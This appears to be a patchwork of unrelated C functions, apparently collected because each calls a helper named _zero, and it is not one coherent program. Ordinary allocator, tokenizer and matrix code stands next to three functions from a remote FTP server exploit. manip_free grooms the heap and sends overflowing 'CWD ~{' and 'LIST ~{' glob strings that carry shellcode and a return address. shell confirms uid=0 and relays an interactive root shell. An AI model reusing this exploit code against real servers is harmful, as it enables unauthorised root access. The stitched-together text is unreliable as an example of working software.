static void _reset(int *set, int *get, hpx_addr_t sync, hpx_addr_t lco) { if (set) { _zero(set); } if (get) { _zero(get); } if (sync) { hpx_lco_reset_sync(sync); } if (lco) { hpx_lco_reset_sync(lco); hpx_lco_set_rsync(lco, sizeof(ZEROS), ZEROS); hpx_lco_reset_sync(lco); } }
mat mat_new(_dim) { mat x = malloc(sizeof(double*) * n); x[0] = malloc(sizeof(double) * n * n); for_i x[i] = x[0] + n * i; _zero(x); return x; }
int login(int sd, char *user, char *pass) { char sendbuf[1024], recvbuf[1024]; _zero(sendbuf); snprintf(sendbuf, sizeof(sendbuf), "USER %s\r\n", user); write(sd, sendbuf, strlen(sendbuf)); read(sd, recvbuf, sizeof(recvbuf)); _zero(sendbuf); snprintf(sendbuf, sizeof(sendbuf), "PASS %s\r\n", pass); write(sd, sendbuf, strlen(sendbuf)); read(sd, recvbuf, sizeof(recvbuf)); if (strstr(recvbuf, "230")) return (0); return (-1); }
/* * TKGetNextToken returns the next token from the token stream as a * character string. Space for the returned token should be dynamically * allocated. The caller is responsible for freeing the space once it is * no longer needed. * * If the function succeeds, it returns a C string (delimited by '\0') * containing the token. Else it returns 0. * * You need to fill in this function as part of your implementation. */ TokenT *TKGetNextToken(TokenizerT *tk) { clearBuffer(tk); char curr = tk->inputIter[0]; // skip all whitespace before next token while(isspace(curr)) { nextChar(tk); clearBuffer(tk); curr = tk->inputIter[0]; } if(curr == '\0') { return NULL; } else if(isalpha(curr) || curr == '_') { return _word(tk); } else if(curr == '0') { return _zero(tk); } else if(isdigit(curr)) { return _decimal(tk); } else if(curr == '!') { // neq return _neq(tk); } else if(curr == '"') { // double_quote return _double_quote(tk); } else if(curr == '#') { return _pound(tk); } else if(curr == '$') { // INVALID return _invalid(tk); } else if(curr == '%') { // mod, mod_eq return _mod(tk); } else if(curr == '&') { // bit_and, log_and, address (?) return _bit_and(tk); } else if(curr == '\'') { // single_quote return _single_quote(tk); } else if(curr == '(') { // open_paren return _open_paren(tk); } else if(curr == ')') { // close_paren return _close_paren(tk); } else if(curr == '*') { // mult, mult_eq, pointer (?) return _mult(tk); } else if(curr == '+') { // plus, plus_eq, inc return _plus(tk); } else if(curr == ',') { // comma return _comma(tk); } else if(curr == '-') { // minus, minus_eq, dec, struct_pointer return _minus(tk); } else if(curr == '.') { // dot return _dot(tk); } else if(curr == '/') { // div, div_eq return _div(tk); } else if(curr == ':') { // ternary_colon return _ternary_colon(tk); } else if(curr == ';') { // semicolon return _semicolon(tk); } else if(curr == '<') { // lt, lshift, lt_eq return _lt(tk); } else if(curr == '=') { // eq, assign return _eq(tk); } else if(curr == '>') { // gt, rshift, gt_eq return _gt(tk); } else if(curr == '?') { // ternary_qmark return _ternary_qmark(tk); } else if(curr == '@') { // INVALID return _invalid(tk); } else if(curr == '[') { // open_bracket return _open_bracket(tk); } else if(curr == '\\') { // backslash (?) return _invalid(tk); } else if(curr == ']') { // close_bracket return _close_bracket(tk); } else if(curr == '^') { // bit_xor return _bit_xor(tk); } else if(curr == '`') { // INVALID return _invalid(tk); } else if(curr == '{') { // open_brace return _open_brace(tk); } else if(curr == '|') { // bit_or, log_or return _bit_or(tk); } else if(curr == '}') { // close_brace return _close_brace(tk); } else if(curr == '~') { // bit_not return _bit_not(tk); } else { return _invalid(tk); } }
void Mem::zeroAndFree(void *mem, SIZE_T size) { _zero(mem, size); free(mem); }
int shell(int sd) { const char cmd[] = "/bin/uname -a; /usr/bin/id\n"; char data[1024]; fd_set set; int n, i; putchar('\n'); n = write(sd, "/usr/bin/id\n", 12); if (n != 12) { perror("write()"); return(-1); } n = read(sd, data, sizeof(data)); if (n == -1) { perror("read()"); return (-1); } if (!strstr(data, "uid=0")) return (-1); n = write(sd, cmd, strlen(cmd)); if (n != (signed) strlen(cmd)) { perror("write()"); return(-1); } for(i = 0; i < 2; i++) { _zero(data); n = read(sd, data, sizeof(data)); if (n == -1) { perror("read()"); return (-1); } data[n] = '\0'; write(1, data, n); } for (;;) { FD_ZERO(&set); FD_SET(0, &set); FD_SET(sd, &set); n = select(sd + 1, &set, NULL, NULL, NULL); if (n == -1) _death(select); if (FD_ISSET(0, &set)) if (forward(0, sd)) break; if (FD_ISSET(sd, &set)) if (forward(sd, 1)) break; } return (1); }
void manip_free(int sd) { int i, n, size = 0; char buf[2048], tmp[2048]; _zero(buf); for (i = 0; i < 145; i++) { size += 1 * i; printf("populating heap (%.2f Kb)\r", (double) size / 1024.0); dornfr(sd, 1); } for (i = 0; i < 20; i++) { size += 100 * i; printf("populating heap (%.2f Kb)\r", (double) size / 1024.0); dornfr(sd, 100); } putchar('\n'); sprintf(buf, "CWD ~{"); for (i = 0; i < 21; i++) strcat(buf, ","); strcat(buf, "}/\r\n"); write(sd, buf, strlen(buf)); sleep(1); n = read(sd, buf, sizeof(buf)); if (n == -1) _death(read); _zero(buf); #ifdef DEBUG printf("press enter to send read() shellcode"); getchar(); #endif puts("sending read() shellcode"); sprintf(buf, "LIST ~{"); for (i = 7; i < 450; i += 4) *(long *) &buf[i] = 0xffffffff; *(long *) &buf[365] = 0xffffffb0; *(long *) &buf[369] = 0xffffffb0; *(long *) &buf[285 + 32 - 24] = 0xfcebf0eb; for (i = 37; i < 285; i += 2) *(short *) &buf[i] = 0xfceb; for (i = 297; i < 309; i += 4) *(long *) &buf[i] = 0xfcebfceb; memcpy(buf + 38, readcode, strlen(readcode)); *(long *) &buf[441] = 0x11111111; *(long *) &buf[445] = 0xfffffffc; *(long *) &buf[449] = 0xfffffffc; *(long *) &buf[453] = mytarget->retloc - 12; if (mytarget->cbuf) *(long *) &buf[457] = mytarget->cbuf; strcat(buf, "\r\n"); escape_ff(buf, tmp); write(sd, tmp, strlen(tmp)); sleep(1); }
/* Allocation routine (called from calloc and malloc) */ void *_mem_alloc(unsigned int size, int zero) { int i = 0, j = 0, tbl = -1; unsigned int bucket = 0xFFFFFFFF; int abucket; struct _mem_chunk *chunk = NULL; struct _mem_taken_bucket *t = NULL; void *ptr = NULL; /* If size is too big, allocate a specialized chunk */ if(size >= MEM_MAX_UNIT - sizeof(struct _mem_bucket)) { while(i < MEM_TABLES && tbl == -1) { if(_mem.chunk_tbls[i] != NULL) { while(j < MEM_TBL_ENTRIES) { if(tbl == -1 && _mem.chunk_tbls[i]->entries[j].start == 0xFFFFFFFF) { tbl = i; break; } j++; } } i++; } /* Create a chunk, specially for this */ chunk = _mem_allocate_chunk(size, tbl, FALSE); if(chunk == NULL) return NULL; t = (struct _mem_taken_bucket*)chunk->start; t->chunk = chunk; t->magic = MEM_MAGIC; _mem.alloc_mem += chunk->length; ptr = (void*)((unsigned int)chunk->start + sizeof(struct _mem_bucket)); if(zero) _zero(ptr, size); return ptr; } /* Find a chunk for us NOTE: We could use another list for this... but I don't have time right now */ while(bucket == 0xFFFFFFFF && i < MEM_TABLES) { if(_mem.chunk_tbls[i] != NULL) { while(bucket == 0xFFFFFFFF && j < MEM_TBL_ENTRIES) { if(tbl == -1 && _mem.chunk_tbls[i]->entries[j].start == 0xFFFFFFFF) tbl = i; bucket = _mem_find_bucket(&_mem.chunk_tbls[i]->entries[j], size, &abucket); j++; } } i++; } /* If we did not get a chunk, */ if(bucket == 0xFFFFFFFF) { chunk = _mem_allocate_chunk(MEM_CHUNK_SIZE, tbl, TRUE); if(chunk == NULL) return NULL; bucket = _mem_find_bucket(chunk, size, &abucket); } else { chunk = &_mem.chunk_tbls[i-1]->entries[j-1]; } /* Take the bucket */ t = _mem_get_bucket(chunk, bucket, abucket); _mem.alloc_mem += t->size; ptr = (void*)((unsigned int)t + sizeof(struct _mem_taken_bucket)); if(zero) _zero(ptr, size); return ptr; }